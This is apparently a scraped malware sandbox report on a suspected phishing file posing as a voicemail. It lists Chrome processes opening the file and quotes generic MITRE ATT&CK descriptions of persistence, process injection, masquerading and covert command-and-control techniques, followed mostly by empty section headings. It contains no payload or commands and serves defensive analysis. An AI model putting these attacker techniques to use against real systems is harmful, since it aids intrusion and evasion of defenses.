• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	0
Start time:	17:34:49
Start date:	17/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff6d1670000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	17:34:50
Start date:	17/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,8860473447837031108,2127390397510089652,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2124 /prefetch:11
Imagebase:	0x7ff6d1670000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	17:34:56
Start date:	17/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(bfrieden)VWAV.xhtml"
Imagebase:	0x7ff6d1670000
File size:	3'384'928 bytes
MD5 hash:	DBE43C1D0092437B88CFF7BD9ABC336C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Play_VM-Now(bfrieden)VWAV.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 43

Chrome Cache Entry: 44

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

General

Static OLE Info

General

OLE File "Play_VM-Now(bfrieden)VWAV.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Play_VM-Now(bfrieden)VWAV.xhtml